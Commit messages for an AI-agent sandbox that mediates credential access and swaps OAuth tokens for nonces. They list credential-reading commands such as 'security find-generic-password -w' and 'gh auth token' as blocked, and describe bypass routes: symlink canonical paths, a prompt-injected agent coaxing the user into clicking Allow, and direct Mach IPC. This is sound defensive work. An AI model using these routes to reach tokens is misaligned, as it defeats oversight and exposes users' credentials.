The deny is a no-op in restricted exec mode (`restrict_process_exec`), where the allowlist model already excludes unlisted paths via the implicit deny default.
Verified: `/opt/homebrew/bin/gh auth token`, `/usr/bin/security find-internet-password -s github.com -w`, and `/usr/bin/security find-generic-password -s gh:github.com -w` all return nonces (or are blocked) when called by absolute path inside the sandbox.
Four unit tests added to `sandbox::macos::tests` covering: deny rules emitted after allow-all, special-char escaping, no-op in restricted mode, and no spurious rules in default caps.
When Ctrl-Z is pressed inside a nono session, the outer terminal is in raw mode (ISIG cleared), so the byte 0x1A is forwarded to the PTY slave rather than raising SIGTSTP on nono itself. The PTY slave has ISIG set, so the kernel delivers SIGTSTP to the agent's process group and the agent stops. Previously waitpid was called without WUNTRACED, so the stopped child was never observed and the supervisor loop spun indefinitely with the outer terminal frozen in raw mode.
Fix: add WUNTRACED to the three PTY-backed waitpid calls so stopped children are visible. On WaitStatus::Stopped(SIGTSTP), restore the outer terminal (pause_terminal_for_prompt), raise SIGTSTP on nono so the parent shell takes over the terminal, then on resume re-enter raw mode (resume_terminal_after_prompt) and send SIGCONT to the agent. This is the standard PTY-proxy job-control pattern used by tmux, ssh, and script.
Other stop signals (SIGSTOP, etc.) keep the existing log-and-continue behaviour since they cannot be caught for the raise/resume dance.
The previous approach (WUNTRACED + WaitStatus::Stopped) did not work because nono calls setsid() in the child to create a new session, which makes the child's process group orphaned. The kernel discards SIGTSTP's default stop action for orphaned process groups, so waitpid(WUNTRACED) never observed a stopped child.
The fix intercepts the raw 0x1a byte (Ctrl-Z) in filter_client_input before it reaches the inner PTY master. On interception, the supervisor:
1. Sends SIGSTOP to the child (unconditional stop, bypasses orphan-PG rule)
2. Calls pause_terminal_for_prompt() to restore the outer terminal
3. Raises SIGTSTP on itself to suspend the supervisor
4. On SIGCONT (user runs fg): calls resume_terminal_after_prompt()
5. Sends SIGCONT to the child to resume it
The WUNTRACED + WaitStatus::Stopped(SIGTSTP) path is retained as a fallback for external SIGTSTP delivery.
Four unit tests cover filter_client_input interception and the take_job_control_request() one-shot semantics.
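The interception step and the one-shot request flag can be sketched as follows. The names `split_job_control` and `JobControl` are hypothetical stand-ins; the actual `filter_client_input` and `take_job_control_request()` signatures are not shown in this PR text, and signal delivery is left out entirely.

```rust
use std::sync::atomic::{AtomicBool, Ordering};

/// Ctrl-Z as it arrives from a terminal in raw mode.
const CTRL_Z: u8 = 0x1a;

/// Hypothetical filter: strips Ctrl-Z bytes from client input and reports
/// whether a suspend was requested. The remaining bytes go to the PTY.
fn split_job_control(input: &[u8]) -> (Vec<u8>, bool) {
    let suspend = input.contains(&CTRL_Z);
    let forwarded = input.iter().copied().filter(|b| *b != CTRL_Z).collect();
    (forwarded, suspend)
}

/// Hypothetical one-shot latch: a request is observed at most once.
struct JobControl {
    requested: AtomicBool,
}

impl JobControl {
    fn new() -> Self {
        JobControl { requested: AtomicBool::new(false) }
    }

    fn request(&self) {
        self.requested.store(true, Ordering::SeqCst);
    }

    /// Returns true once per request and clears the flag atomically.
    fn take(&self) -> bool {
        self.requested.swap(false, Ordering::SeqCst)
    }
}
```

In this sketch the supervisor loop would call `take()` after each input batch and, when it returns true, run the five steps listed above.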
Adds the missing counterpart to pause_terminal_for_prompt, called after the supervisor returns from raise(SIGTSTP). Re-enters raw terminal mode and replays the screen so the attach view is restored. Signed-off-by: James Carnegie <me@kipz.org>
which::which resolves the first executable in PATH but does not follow symlinks. The blocked_binaries deny rule was emitted only for the as-found path (e.g. /opt/homebrew/bin/gh), leaving the real binary target (/opt/homebrew/Cellar/gh/2.92.0/bin/gh) unblocked. An agent could bypass mediation by calling the canonical path directly.
Fix: after pushing the as-found path to blocked_binaries, also push the canonicalized path if it differs. Seatbelt deny rules are then emitted for both paths, closing the symlink bypass.
Verified by test-mediation-absolute-path.sh: gh auth token via the resolved Cellar path is now blocked with exit 126.
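A minimal sketch of the fix, using only the standard library. `blocked_paths` is a hypothetical helper; in the PR the paths are pushed onto `blocked_binaries` directly, and the as-found path comes from `which::which`.

```rust
use std::fs;
use std::path::{Path, PathBuf};

/// Hypothetical helper: returns the as-found path plus its canonical target
/// when the two differ, so deny rules can cover both.
fn blocked_paths(found: &Path) -> Vec<PathBuf> {
    let mut blocked = vec![found.to_path_buf()];
    // canonicalize resolves symlinks; it fails if the path does not exist,
    // in which case only the as-found path is recorded.
    if let Ok(real) = fs::canonicalize(found) {
        if real.as_path() != found {
            blocked.push(real);
        }
    }
    blocked
}
```

For a Homebrew-style symlink this would produce two entries, the link in the bin directory and the Cellar target it points to.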
…ver)
Adds the proxy-side machinery to capture and substitute Anthropic OAuth
tokens. Used by the nono-cli wiring in the next commit (`oauth_capture`
profile flag) but kept here as a self-contained primitive: any other
nono-cli client could drive these routes/hooks against a different
upstream by supplying a `TokenResolver`.
## Components
- `oauth_rewrite::rewrite_oauth_json_body` — Layer 1 response-body
rewriter. Parses Anthropic's OAuth token response, mints two nonces
via `TokenResolver::capture_oauth_pair`, substitutes them in the
body. Drops `Content-Length`/`Transfer-Encoding`/`Content-Encoding`
so hyper re-frames the response. Includes chunked-transfer decoding
before invoking the hook.
- `config::InjectMode::OauthCapture { token_url_match, refresh_url_match }`
— new variant that flags a route as OAuth-capture eligible.
- `route::LoadedRoute::requires_intercept` — extended so OauthCapture
routes trigger TLS interception even without `credential_key` or
`endpoint_rules`.
- `route::LoadedRoute::oauth_capture_match` — pre-compiled pattern
matchers populated when the route's `inject_mode` is OauthCapture.
- `tls_intercept::handle` — Layer 1.2 inside-CONNECT-tunnel bearer
swap: rewrites `Authorization: Bearer nono_<hex>` to the real
bearer on egress. Required for the Console flow's immediate
`/v1/oauth/claude_cli/create_api_key` call within the same tunnel.
- `reverse` — Layer 2 reverse-proxy bearer swap for ongoing API
calls outside the CONNECT tunnel.
- `forward` — response-hook plumbing through the forwarding path.
- `audit::log_oauth_capture` — audit event on every minted nonce pair.
- `broker.rs` — `TokenResolver` trait with `issue` / `resolve` /
`capture_oauth_pair` default. Provides the seam by which nono-cli's
`TokenBroker` plugs into the proxy.
- `server.rs` — `ProxyRuntime { token_resolver }` parameter for
passing the resolver in at startup. Adds the reserved `__nono_`
route-prefix namespace so user-supplied profiles cannot collide
with the synthesised capture routes.
- `Cargo.toml` — adds `bytes` direct dep (used by `oauth_rewrite` for
buffered body manipulation).
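The bearer swap performed on egress can be illustrated with a small sketch. The `Resolver` trait below is a simplified, hypothetical stand-in for `TokenResolver` (its real method signatures are not shown in this message), and `swap_bearer` is an illustrative name.

```rust
use std::collections::HashMap;

/// Hypothetical, simplified stand-in for the proxy's resolver seam.
pub trait Resolver {
    fn resolve(&self, nonce: &str) -> Option<String>;
}

/// Map-backed resolver used only for illustration.
pub struct MapResolver(pub HashMap<String, String>);

impl Resolver for MapResolver {
    fn resolve(&self, nonce: &str) -> Option<String> {
        self.0.get(nonce).cloned()
    }
}

/// Rewrite `Bearer nono_<hex>` to `Bearer <real token>`.
/// Returns None when the value is not a nonce bearer or the nonce is unknown.
pub fn swap_bearer(value: &str, resolver: &dyn Resolver) -> Option<String> {
    let token = value.strip_prefix("Bearer ")?;
    let hex = token.strip_prefix("nono_")?;
    if hex.is_empty() || !hex.bytes().all(|b| b.is_ascii_hexdigit()) {
        return None;
    }
    resolver.resolve(token).map(|real| format!("Bearer {real}"))
}
```

What the caller does on `None` (forward unchanged, or reject) is a policy decision this sketch leaves open.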
## Build state
This commit introduces `InjectMode::OauthCapture` but does not handle
it in nono-cli's pattern matches (which still expect the four
pre-existing variants). The next commit adds those handlers. CI runs
against the PR tip, so the intermediate-commit build state is not
load-bearing. The final tree builds cleanly.
Signed-off-by: Christine Le <christine.le@datadoghq.com>
Drives the nono-proxy OAuth-capture primitive (previous commit) via a
single profile flag. Adds the mediation-shim `format: "json"` capture
that the 2026-06-03 plan settled on for protecting the
`Claude Code-credentials` keychain envelope without rewriting it.
## Flag + auto-injection
- `profile.oauth_capture: bool` — opt-in field on the profile schema.
- When true, the CLI auto-injects three TLS-intercept routes
(`api.anthropic.com`, `claude.ai`, `platform.claude.com`) into the
proxy config and wires the in-memory `TokenBroker` as the proxy's
`TokenResolver`. Profile schema + builder docs updated.
## API-key preflight fail-closed (macOS)
`crates/nono-cli/src/oauth_preflight.rs` refuses to start the proxy
when an API-key surface is already present in the user's environment:
- `ANTHROPIC_API_KEY`, `CLAUDE_CODE_API_KEY_FILE_DESCRIPTOR`,
`ANTHROPIC_UNIX_SOCKET` env vars (skipped if `denied_env_vars`
would strip them anyway)
- `primaryApiKey` in `~/.claude.json`
- macOS `Claude Code` (no `-credentials` suffix) keychain entry
The OAuth-capture path proxies `Authorization: Bearer` tokens; an
`x-api-key` request inside the CONNECT tunnel would 401 against
upstream. Failing closed before the child spawns produces a clear
diagnostic instead of a silent breakage.
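The env-var part of the preflight could look roughly like this. It is a sketch under assumptions: `conflicting_env_vars` is a hypothetical name, the lookup is injected as a closure (real code would presumably consult `std::env::var_os`), and the `~/.claude.json` and keychain checks are omitted.

```rust
/// Env vars the commit message lists as API-key surfaces.
const API_KEY_ENV_VARS: [&str; 3] = [
    "ANTHROPIC_API_KEY",
    "CLAUDE_CODE_API_KEY_FILE_DESCRIPTOR",
    "ANTHROPIC_UNIX_SOCKET",
];

/// Return the API-key env vars that are set and would NOT be stripped
/// by `denied_env_vars`. A non-empty result means "refuse to start".
pub fn conflicting_env_vars(
    is_set: impl Fn(&str) -> bool,
    denied_env_vars: &[&str],
) -> Vec<&'static str> {
    API_KEY_ENV_VARS
        .iter()
        .copied()
        // Skip vars the sandbox would strip anyway.
        .filter(|name| !denied_env_vars.iter().any(|d| d == name))
        // Keep only vars actually present in the environment.
        .filter(|name| is_set(*name))
        .collect()
}
```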
## Mediation: JSON-format capture for keychain envelope substitution
Extends the mediation `capture` action with two new fields:
- `format: "json"` — parse stdout as JSON before extraction
- `secret_paths` — dotted JSON paths whose values are nonced
Used by shadowfax profile rules on `security find-generic-password
Claude Code-credentials` to mint nonces on every read of claude's own
keychain entry without rewriting it. Fails closed on malformed JSON
and non-string values; missing paths are silently skipped (documented
contract). Anthropic's `claudeAiOauth.{accessToken,refreshToken}` are
the only intended substitution targets; the `mcpOAuth.*` subtree
passes through unchanged so MCP plugins' credentials work.
Tests: full coverage of matched/missing/non-string paths + malformed-
JSON fail-closed (no credential leak via stdout or stderr) +
idempotence-of-shape with fresh nonces per call. End-to-end tests
through `mediation::policy::apply` exercise the dispatcher's
`Capture { format: Some(Json) }` arm against a realistic keychain-
envelope script.
## Argument-ordering regression tests
`security find-generic-password` accepts two argv orderings (account-
first and service-first). Each must have its own intercept rule —
profile authors who only ship one ordering have a leak path. Tests
pin `subcommand_matches` against both shapes and the flag-interleaved
variant.
## Pattern-match completeness
Extends nono-cli's pattern matches over `nono_proxy::config::InjectMode`
to cover the new `OauthCapture` variant introduced in the previous
commit. The intermediate-commit non-build state is now resolved.
## Documentation
- `docs/plans/2026-05-14-mediation-profile-authoring-ux.md`
- `docs/plans/2026-06-03-mediation-based-oauth-capture.md`
- `tests/integration/test_mediation_audit.sh`
## What this does NOT do
- No broker persistence (no cross-session resume yet). Per-session
in-memory broker only. Cross-session resume lands in the next
commit series.
- No code-signing entitlements. Future hardening option.
- No Linux preflight (it was removed in earlier work); this commit
ships only the macOS API-key check.
Signed-off-by: Christine Le <christine.le@datadoghq.com>
…rs (macOS)
Without persistence, the in-memory broker that holds real OAuth tokens dies when nono exits. Subsequent sessions find claude's keychain still populated with `nono_<hex>` nonces but the new broker can't resolve them: Anthropic returns 401 and the user has to `/login` again every session. This is a regression vs running `claude` outside nono.
Persist the captured `(access_token, refresh_token)` pair to the macOS Keychain under `service="nono", account="claude_oauth_broker"`. On startup the broker hydrates from the persisted record and re-registers the same nonces it issued in the previous session, so the keychain entry the sandboxed claude reads continues to resolve.
The broker keychain entry carries a strict trusted-application ACL listing only the nono binary by path. securityd enforces this by code signature: any other process (sandboxed claude, the `security` CLI, plugins reading the keychain directly via `SecItemCopyMatching`) is denied silently. This is what makes persisted real tokens unreachable from the agent even though shadowfax's profile grants the agent broad Mach IPC access to securityd.
All Security framework calls run in-process (the nono binary, which is in the ACL) via `security-framework` + direct FFI for the legacy ACL APIs (`SecAccessCreate`, `SecTrustedApplicationCreateFromPath`, `kSecAttrAccess`) not re-exported by the safe crate. No `security` CLI subprocess is used: the original PR 40 attempt hit two bugs there (argv leak `c873ca36`, 128-byte `readpassphrase` truncation `aa4e51af`), which this implementation avoids by construction.
Stale-entry handling: the stored `nono_path` field is compared against `current_exe()` on load. A mismatch (upgrade, reinstall, `cargo install` rebuild) means the existing entry's ACL is keyed to a binary that no longer matches; the broker deletes the stale entry and returns None. The next OAuth capture creates a fresh entry with the correct ACL.
Linux is not supported. Linux keyring backends (secret-service, gnome-keyring) have no per-entry ACL: entries are readable by any same-user process, defeating the protection model. Linux callers get an in-memory-only broker.
Tests (7 new in broker.rs, 4 in broker_store.rs):
- `capture_oauth_pair_without_store_just_issues_two_nonces`: default trait behaviour for the no-store path.
- `capture_oauth_pair_with_store_persists_record`: pair-capture writes through to the store.
- `with_store_hydrates_existing_record_into_memory`: startup re-registers nonces from the persisted record so the keychain's stale-looking nonces resolve immediately.
- `with_store_propagates_load_errors`: load errors are not silent (a corrupted persisted record fails loudly rather than degrading).
- `capture_oauth_pair_swallows_save_errors`: save errors are best-effort; the capture path keeps working in-memory.
- `persisted_json_payload_exceeds_readpassphrase_buffer`: regression guard against reintroducing a `security ... -w` (stdin to readpassphrase) backend.
- `nono_path_round_trips_through_json` + `missing_nono_path_deserialises_as_none`: staleness detection field handling.
- `memory_store_round_trips_save_load_clear`: in-memory test backend invariant.
All 120 mediation tests pass (was 113 on parent branch). `cargo clippy -D warnings -D clippy::unwrap_used` clean.
Signed-off-by: Christine Le <christine.le@datadoghq.com>
Addresses limitations #1 (orphan GC) and #4 (refresh pruning) from the 2026-06-09 addendum in 2026-04-27-capture-anthropic-auth.md.
## Limitation #1: orphan GC at hydrate time
When the user runs `/logout` inside claude, the `Claude Code-credentials` keychain entry is wiped, but the broker's persisted record still holds the real refresh token. Without GC, the next nono session would rehydrate dead tokens that Anthropic still considers valid (refresh tokens live ~1 year), violating the user's "logout means tokens are gone" mental model.
`TokenBroker::with_store_and_reader` adds a hook that reads claude's own keychain entry on startup. If `claudeAiOauth.accessToken` matches the persisted `access_nonce`, the record is live and hydrates normally. Otherwise (entry missing, holds a real `sk-ant-...` token, or holds a different nonce from another session), the broker clears the persisted record and starts empty. The next `/login` will mint fresh nonces. Read failures collapse to "entry missing" (conservative choice: drop a live record and force re-login rather than leak a real token because we couldn't tell).
The existing `with_store` shorthand keeps a no-op reader for backwards compat, which is appropriate for command-mediation callers that don't have a `Claude Code-credentials` entry to cross-reference.
## Limitation #4: refresh-rotation pruning
Long sessions trigger token refresh; the proxy intercepts each new pair and calls `capture_oauth_pair`. Previously the OLD nonces stayed in the in-memory map until session end, so the map grew with refresh count over multi-day sessions.
`TokenBroker` now tracks `current_pair: Mutex<Option<(access_nonce, refresh_nonce)>>`. `capture_oauth_pair` prunes the previous pair from the in-memory map before minting the new one, and updates `current_pair` to the new nonces. Hydrate also sets `current_pair` so the first post-hydrate capture prunes the hydrated pair.
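The refresh-rotation pruning can be sketched as follows. This is an illustration only: `Broker` is a hypothetical stand-in for `TokenBroker`, and nonces come from a counter so the behaviour is deterministic, whereas the real broker presumably mints random hex.

```rust
use std::collections::HashMap;
use std::sync::{Mutex, MutexGuard};

/// Lock helper that tolerates poisoning instead of panicking.
fn lock<T>(m: &Mutex<T>) -> MutexGuard<'_, T> {
    m.lock().unwrap_or_else(|e| e.into_inner())
}

/// Hypothetical stand-in for the in-memory part of the broker.
pub struct Broker {
    tokens: Mutex<HashMap<String, String>>, // nonce -> real token
    current_pair: Mutex<Option<(String, String)>>,
    counter: Mutex<u64>, // deterministic nonce source (sketch only)
}

impl Broker {
    pub fn new() -> Self {
        Broker {
            tokens: Mutex::new(HashMap::new()),
            current_pair: Mutex::new(None),
            counter: Mutex::new(0),
        }
    }

    fn issue(&self, real: &str) -> String {
        let mut n = lock(&self.counter);
        *n += 1;
        let nonce = format!("nono_{:016x}", *n);
        lock(&self.tokens).insert(nonce.clone(), real.to_string());
        nonce
    }

    pub fn resolve(&self, nonce: &str) -> Option<String> {
        lock(&self.tokens).get(nonce).cloned()
    }

    pub fn len(&self) -> usize {
        lock(&self.tokens).len()
    }

    /// Prune the previous pair, mint a new one, remember it as current.
    pub fn capture_oauth_pair(&self, access: &str, refresh: &str) -> (String, String) {
        let mut current = lock(&self.current_pair);
        if let Some((old_access, old_refresh)) = current.take() {
            let mut tokens = lock(&self.tokens);
            tokens.remove(&old_access);
            tokens.remove(&old_refresh);
        }
        let pair = (self.issue(access), self.issue(refresh));
        *current = Some(pair.clone());
        pair
    }
}
```

With this shape the map holds at most one access/refresh pair per capture stream, regardless of how many refreshes a long session performs.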
## Production wiring
`proxy_runtime::build_broker` now passes the real keychain reader (`broker_store::current_claude_access_token`). The reader replicates the keychain service-name derivation from `sandbox_prepare.rs` (mirror rather than depend, so this module stays self-contained).
## Tests (+5 over previous commit, 20 total in broker.rs)
- `with_store_hydrates_existing_record_when_claude_keychain_matches`: happy path; live record hydrates.
- `with_store_clears_orphan_when_claude_keychain_missing`: `/logout` case; broker record cleared.
- `with_store_clears_orphan_when_claude_keychain_holds_real_token`: user `/login`-ed outside nono after `/logout`; record cleared.
- `with_store_clears_orphan_when_claude_keychain_holds_different_nonce`: race with another nono session; record cleared, latest wins.
- `capture_oauth_pair_prunes_previous_pair_from_memory`: refresh rotation; old nonces removed.
- `hydrate_then_capture_prunes_hydrated_pair`: hydrated pair pruned on first refresh after session start.
All 127 mediation tests pass. `cargo clippy -D warnings -D clippy::unwrap_used` clean.
Signed-off-by: Christine Le <christine.le@datadoghq.com>
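The orphan-GC decision this commit describes for hydrate time reduces to a single comparison. A minimal sketch, assuming hypothetical names (`HydrateDecision`, `decide_hydrate`) and a reader that already collapses read failures to `None`:

```rust
/// Outcome of the hydrate-time orphan check (hypothetical type).
#[derive(Debug, PartialEq)]
pub enum HydrateDecision {
    /// The persisted record is live; re-register its nonces.
    Hydrate,
    /// The persisted record is orphaned; clear it and start empty.
    ClearOrphan,
}

/// `claude_access_token` is the value of `claudeAiOauth.accessToken` read
/// from claude's own keychain entry; `None` means missing or unreadable.
pub fn decide_hydrate(
    persisted_access_nonce: &str,
    claude_access_token: Option<&str>,
) -> HydrateDecision {
    match claude_access_token {
        // Only an exact nonce match counts as live.
        Some(tok) if tok == persisted_access_nonce => HydrateDecision::Hydrate,
        // Missing entry, real token, or a different nonce: drop the record.
        _ => HydrateDecision::ClearOrphan,
    }
}
```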
Addresses limitation #3 from the 2026-06-09 addendum.
The default login keychain is auto-unlocked at GUI login but locks on sleep and is generally not unlocked under SSH. Without distinguishing these failures from other Security framework errors, the user sees a generic "broker record load failed" warning and cannot tell whether the issue is environmental (unlock the keychain) or a real bug.
Classifies three OSStatus codes as "keychain locked":
- errSecInteractionNotAllowed (-25308): UI required but not allowed
- errSecAuthFailed (-25293): authentication failed
- errSecNotAvailable (-25291): no keychain available
Both `load_in_process` and `save_with_nono_acl` emit a single actionable message naming the common causes (SSH, post-sleep, manual lock) and stating the consequence ("cross-session resume disabled"). The build_broker fallback path surfaces this message verbatim; no further changes are needed there since the existing warn already prints the error.
`build_broker` continues to fall back to an in-memory-only broker when the keychain is locked, so the current session works unchanged. Only cross-session resume is lost until the user unlocks the keychain.
Tests:
- `locked_keychain_status_recognised_for_known_codes`: the three codes classify as locked.
- `locked_keychain_status_rejects_other_codes`: errSecItemNotFound, errSecParam, and success do not classify as locked.
- `locked_keychain_message_is_actionable`: message names failure mode + common cause + consequence + OSStatus code, and does not contain real-token-shaped strings.
All 134 mediation tests pass (was 127). `cargo clippy -D warnings -D clippy::unwrap_used` clean.
Signed-off-by: Christine Le <christine.le@datadoghq.com>
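The classification itself is a small predicate over `OSStatus`. The sketch below uses a hypothetical function name and plain `i32` constants whose numeric values follow Apple's `SecBase.h` as I understand it; real code would more likely use the constants exported by its Security framework bindings.

```rust
// OSStatus values per Apple's SecBase.h (hard-coded here for the sketch).
pub const ERR_SEC_INTERACTION_NOT_ALLOWED: i32 = -25308;
pub const ERR_SEC_AUTH_FAILED: i32 = -25293;
pub const ERR_SEC_NOT_AVAILABLE: i32 = -25291;
pub const ERR_SEC_ITEM_NOT_FOUND: i32 = -25300;
pub const ERR_SEC_PARAM: i32 = -50;
pub const ERR_SEC_SUCCESS: i32 = 0;

/// True if `status` should be reported as "keychain locked".
pub fn is_locked_keychain_status(status: i32) -> bool {
    matches!(
        status,
        ERR_SEC_INTERACTION_NOT_ALLOWED | ERR_SEC_AUTH_FAILED | ERR_SEC_NOT_AVAILABLE
    )
}
```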
Addresses limitation #9 (ACL invariant assertion) from the 2026-06-09 addendum.
The persistence model is only safe as long as every broker keychain entry is written with a code-signed ACL restricting access to the nono binary. If a future refactor uses `keyring::set_password` (or plain `SecItemAdd` without `kSecAttrAccess`), the agent reads the real OAuth tokens directly. The threat is structural rather than runtime: a single refactor in the wrong direction silently breaks the invariant.
Defenses added:
1. Load-bearing docstring on the module's `## Keychain ACL` section, stating the invariant explicitly and listing the forbidden API (`keyring::set_password`). The `keyring` crate is intentionally not imported by this module's macOS code; the comment makes that non-accidental.
2. Unit test `create_nono_access_succeeds_for_current_exe`: the production-path ACL builder works against the running binary.
3. Unit test `create_nono_access_fails_for_nonexistent_path`: the ACL builder fails closed when given a bogus path rather than silently producing an access tied to a dangling reference. This is the guard against a future bug (relative-path resolution, etc.) producing a permissive-by-accident entry.
4. `#[ignore]`-d integration test `acl_round_trip_manual_only`: full save/load round-trip against the real login keychain, runnable before a release that changes anything in the macOS save path. Includes a TODO for extending it with the SecAccessCopyACLList walk to assert exactly-one-trusted-app-matching-current-exe; until that FFI lands, manual inspection via Keychain Access.app during the test window is the floor.
All 132 mediation tests pass + 1 ignored. Clippy clean.
Signed-off-by: Christine Le <christine.le@datadoghq.com>
…ds (macOS)
Closes the "user clicks Allow on prompt-injected dialog" threat
discovered in manual security testing on 2026-06-09.
## Background
Earlier commits on this branch persist captured OAuth pairs to a
keychain entry under `service="nono", account="claude_oauth_broker"`
with a legacy `SecAccess` ACL listing only the nono binary as a
trusted application. The original commit message claimed `securityd`
"silently denies" non-trusted callers. Testing confirmed this was
wrong: the legacy ACL triggers a system dialog ("X wants to access
key 'nono' in your keychain") asking the user to Allow or Deny.
A sophisticated prompt-injected agent that social-engineers the user
into clicking Allow defeats the ACL. The protection model needed to
either eliminate the prompt (true silent denial) or close the
attack path before it reaches securityd.
## What this commit does
Auto-injects a mediation rule into `MediationConfig` whenever a
profile sets `oauth_capture: true`. The shim intercepts subprocess
`security find-generic-password -s nono -a claude_oauth_broker`
(both argv orderings) in the unsandboxed parent process and returns
`errSecItemNotFound` (exit 44, empty stdout) without ever invoking
the real binary. The call never reaches macOS securityd. No dialog,
no Allow button, no social-engineering surface.
The legacy ACL on the broker entry is now defense-in-depth, not the
primary protection. It catches direct Mach IPC bypasses
(`SecItemCopyMatching` from a native binary linked against
Security framework) with the same dialog as before — the user sees
a visible alert. That is the residual Mach-IPC gap the
2026-06-03 plan already accepted for the `Claude Code-credentials`
entry.
## Coverage
- Both flag orderings: `-s X -a Y` and `-a Y -s X`. The matcher
filters `-`-prefixed tokens, so the positional stream is what
determines the match. Argv parsing was confirmed against
`/usr/bin/security` directly:
- Pure positional (`find-generic-password nono claude_oauth_broker`)
is rejected by the security CLI — service/account must be flags.
- A leading positional that's a real keychain path changes the
search target via BSD getopt, so it cannot read the broker
entry through this bypass.
- Reads only (resolved decision). Write attempts
(`add-generic-password`, `delete-generic-password`) fall through
to passthrough; the legacy ACL catches them and the user sees a
dialog as defense-in-depth.
- Merge semantics: Prepend (resolved decision). Auto-injected
intercepts are evaluated FIRST, before any profile-declared
rules. A downstream profile cannot displace the protection by
accident or design.
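The flag-filtering match described under Coverage can be sketched like this. The function names are hypothetical and the real `subcommand_matches` may differ; the sketch assumes a prefix match on the positional stream, which is consistent with the trailing-keychain-positional case being blocked.

```rust
/// Positional stream of an argv: every token that does not start with '-'.
/// Flag values such as the `nono` in `-s nono` count as positionals here.
pub fn positional<'a>(argv: &[&'a str]) -> Vec<&'a str> {
    argv.iter().copied().filter(|t| !t.starts_with('-')).collect()
}

/// True if the positional stream of `argv` starts with `pattern`.
pub fn matches_rule(argv: &[&str], pattern: &[&str]) -> bool {
    let pos = positional(argv);
    pos.len() >= pattern.len() && pos.iter().zip(pattern).all(|(a, b)| a == b)
}

/// One rule per argv ordering, as the commit message requires.
pub fn is_broker_read(argv: &[&str]) -> bool {
    const SERVICE_FIRST: [&str; 3] = ["find-generic-password", "nono", "claude_oauth_broker"];
    const ACCOUNT_FIRST: [&str; 3] = ["find-generic-password", "claude_oauth_broker", "nono"];
    matches_rule(argv, &SERVICE_FIRST) || matches_rule(argv, &ACCOUNT_FIRST)
}
```

Because the two orderings produce different positional streams, dropping either constant would leave one ordering unmatched.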
## Implementation
- New module `crates/nono-cli/src/mediation/broker_protection.rs`:
- `oauth_capture_mediation_rules() -> Vec<CommandEntry>` — builds
the `security` CommandEntry with refusal intercepts.
- `inject_into(&mut MediationConfig)` — prepends the auto-injected
intercepts onto any existing `security` entry, or creates one
if absent.
- `sandbox_prepare.rs` hook: when `profile.oauth_capture` is true,
call `broker_protection::inject_into(&mut profile_mediation)`
before constructing `PreparedSandbox`.
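The Prepend merge can be illustrated with simplified types. `CommandEntry` and `Intercept` below are hypothetical reductions of the real structs, and `inject_into` here operates on a plain `Vec` rather than `MediationConfig`.

```rust
/// Simplified intercept rule (hypothetical shape).
#[derive(Debug, Clone, PartialEq)]
pub struct Intercept {
    pub label: String,
}

/// Simplified per-command entry (hypothetical shape).
#[derive(Debug, Clone, PartialEq)]
pub struct CommandEntry {
    pub name: String,
    pub intercepts: Vec<Intercept>,
}

/// Prepend `injected`'s intercepts onto the entry with the same name,
/// or add the entry if no such command exists yet.
pub fn inject_into(commands: &mut Vec<CommandEntry>, injected: CommandEntry) {
    if let Some(pos) = commands.iter().position(|c| c.name == injected.name) {
        let existing = &mut commands[pos];
        // Injected rules first, then whatever the profile declared.
        let mut merged = injected.intercepts;
        merged.append(&mut existing.intercepts);
        existing.intercepts = merged;
    } else {
        commands.push(injected);
    }
}
```

Since rules are evaluated in order, placing the injected intercepts first means a profile-declared catch-all cannot shadow them.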
## Tests
7 new unit tests in `broker_protection`:
- module returns one CommandEntry named "security"
- refusal intercepts use Respond with exit 44 + empty stdout
- both argv orderings covered
- inject creates entry when security absent
- inject prepends to existing security entry (merge correctness)
- inject does not touch other CommandEntry names
- (macOS) constants match `broker_store` constants (compile-time
consistency)
7 new integration tests in `mediation::policy::apply`:
- service-first argv blocked (exit 44, empty stdout, no leak)
- account-first argv blocked (alternate ordering)
- interleaved-flags variant blocked
- trailing-keychain-positional variant blocked
- other service/account combos pass through (no over-blocking of
`service="nono", account="openai_api_key"` style entries)
- `Claude Code-credentials` reads pass through (no displacement of
shadowfax's existing rule)
- auto-injected refusal fires BEFORE a pathological profile-
declared catch-all (Prepend merge correctness via apply)
## Documentation corrections
- `broker_store.rs` module docstring — replaces the "silently denies"
claim with the two-layer model: mediation refusal as primary
protection, legacy ACL as defense-in-depth against Mach IPC.
- `broker_store.rs::create_nono_access` docstring — same correction
at the function level.
- `2026-04-27-capture-anthropic-auth.md` 2026-06-09 addendum gets a
follow-up note: the earlier text overstated the ACL's role.
Limitation #9 is rewritten to describe the actual protection
layering.
## What does NOT change
- `KeystoreBrokerStore::save` / `load` implementation — the ACL is
still set, still load-bearing as defense-in-depth.
- `proxy_runtime::build_broker` — still wires the keystore.
- All orphan-GC, refresh-pruning, locked-keychain logic from prior
commits on this branch.
- Release pipeline — no code-signing, no entitlements, no
notarization changes. Auto-injection of the mediation rule
works on unsigned dev builds and on signed release builds
identically.
All 146 mediation tests pass (132 before this commit, 14 new). `cargo clippy
-D warnings -D clippy::unwrap_used` clean. `cargo fmt --check`
clean.
Manual security re-test (S2 from the prior review session) must
confirm: agent's `security find-generic-password -s nono -a
claude_oauth_broker -w` from inside the sandbox now returns exit
44 with no dialog. The argv-coverage audit is documented in the
new module's docstring; any argv shape that bypasses the rule
indicates a coverage gap and needs an additional intercept.
Signed-off-by: Christine Le <christine.le@datadoghq.com>
Adds a new profile field, broker-backed reverse-proxy route, and preflight check that together let nono mediate Claude Code's apiKeyHelper-issued bearer tokens through an arbitrary upstream gateway.
The real bearer stays in the unsandboxed parent; the sandboxed agent only ever sees `nono_<hex>` nonces. The proxy resolves nonces to real bearers on egress to the configured gateway upstream.
All gateway-specific values (URL, helper binary name, helper argv prefix, allowed domain) are supplied via the profile JSON; the shipping code is vendor-neutral.
Reuses the TokenBroker + reverse-proxy passthrough machinery from PR #40's OAuth-capture work; no new primitives.
- crates/nono-cli/src/profile/mod.rs: ApiKeyGatewayConfig + plumbing through Profile, ProfileDeserialize, merge_profiles, test literals
- crates/nono-cli/src/sandbox_prepare.rs: PreparedSandbox.apikey_gateway
- crates/nono-cli/src/launch_runtime.rs: ProxyLaunchOptions field + mediation pass-through so preflight can verify coverage
- crates/nono-cli/src/proxy_runtime.rs: apikey_gateway_route() at reserved __nono_apikey_gateway prefix; ANTHROPIC_BASE_URL override; broker wiring shared with oauth_capture
- crates/nono-cli/src/oauth_preflight.rs: apiKeyHelper coverage check reading ~/.claude/settings.json; shell_split; covering-rule lookup; three new unit tests using the codebase's ENV_LOCK + EnvVarGuard
Signed-off-by: Christine Le <christine.le@datadoghq.com>
Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
